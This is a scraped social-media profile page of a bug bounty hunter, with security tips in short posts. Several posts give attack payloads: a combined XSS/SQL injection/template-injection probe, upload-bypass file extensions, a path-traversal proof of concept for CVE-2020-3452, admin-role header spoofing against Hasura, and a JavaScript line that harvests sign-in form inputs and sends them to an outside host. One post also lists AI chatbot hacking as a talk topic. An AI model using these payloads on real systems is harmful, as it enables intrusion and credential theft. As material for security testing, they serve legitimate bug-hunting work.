Olivia
Online
Hossam Sec
@HossamSec
| Bug Bounty Hunter | | programmer |
🚩
Joined July 2018
1.5K Following
2.3K Followers
2.8K Posts
Pinned Tweet
To test XSS + SQLi + SSTI/CSTI with the same payload use :
'"><svg/onload=prompt(5);>{{7*7}}
' ==> for Sql injection
"><svg/onload=prompt(5);> ==> for XSS
{{7*7}} ==> for SSTI/CSTI
#bugbounty #infosec #TogetherWeHitHarder #bugbountyprotip #Pentesting #bugbountytips by me !
Iam in India with @StandoffBB team
Behold for the talk in 13/SEP in @bsidesahmedabad
With a so interesting topics
I will talk about
1 sourcegraph dorking
2IDORS /BAC via authorize burp Ext
3 with &without AI
4 AI chatbot hacking
5 Prompt from AI to other AI (Build your method in UI)
6 VirusTotal V2 scrip
7 #bugbountytip #bugbountytips a lot of tips
#bugbounty
Come back #Soon
An Awesome Account Takeover just by adding .json on endpoint by @SalahHasoneh1
#bugbounty #bugbountytip
Who to follow
mohammed eldeeb 
@malcolmx0x
Bug Bounty Hunter & security engineer
streaak
@streaak
BBAC kidnapped me | I hack things, play video games and occasionally take photographs
gujjuboy10x00
@vis_hacker
Vishal Panchani Security Engineer | Hall of Fame: Google, PayPal, Apple, 500+| Top 10 All-Time on HackerOne | Hack the planet
@alicanact60 Great which program you reported these bugs ?
@thedawgyg @Hacker0x01 Great is that for subdomain of main domain or acquisition or a a domain belongs to vzm ?
Extension list for File upload bugs
ASP: ".aspx", ".config", ".ashx", ".asmx", ".aspq", ".axd", ".cshtm", ".cshtml", ".rem", ".soap", ".vbhtm", ".vbhtml", ".asa", ".asp", ".cer", "shtml"
PHP: php, php5, php3, php2, shtml, html, .php.png(double extension attack)
Here is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower.
For example to read "/+CSCOE+/portal_inc.lua" file.
https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
Happy Hacking!
Interesting Hasura GraphQL Framework Access Control Issue.
Found an authenticated endpoint "/script"
Added two headers to the existing request:
X-Hasura-Role: admin
X-Hasura-User-Id: 0
Was able to query as admin 😀
When you find XSS over open redirect on sign-in/up pages, just capture the credentials and hijack them 😉
PoC: javascript:inpts=document.querySelectorAll('input');info='';for(i=0;i<inpts.length;i++){info+=','+inputs[i].value};location.href='https://xhze.em/?'+info
#bugbountytip
@pyn3rd Can you share the exploit
@0xPMD Why
Last Seen Users on Sotwe
Most Popular Users
Elon Musk
@elonmusk
240.2M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
109M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.3M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.6M followers
KATY PERRY
@katyperry
86.8M followers
Taylor Swift
@taylorswift13
80.6M followers
Lady Gaga
@ladygaga
72.2M followers
Kim Kardashian
@kimkardashian
69.4M followers
YouTube
@youtube
68.6M followers
Virat Kohli
@imvkohli
68.6M followers
Bill Gates
@billgates
63.4M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61.1M followers
X
@x
60.9M followers
Selena Gomez
@selenagomez
59.9M followers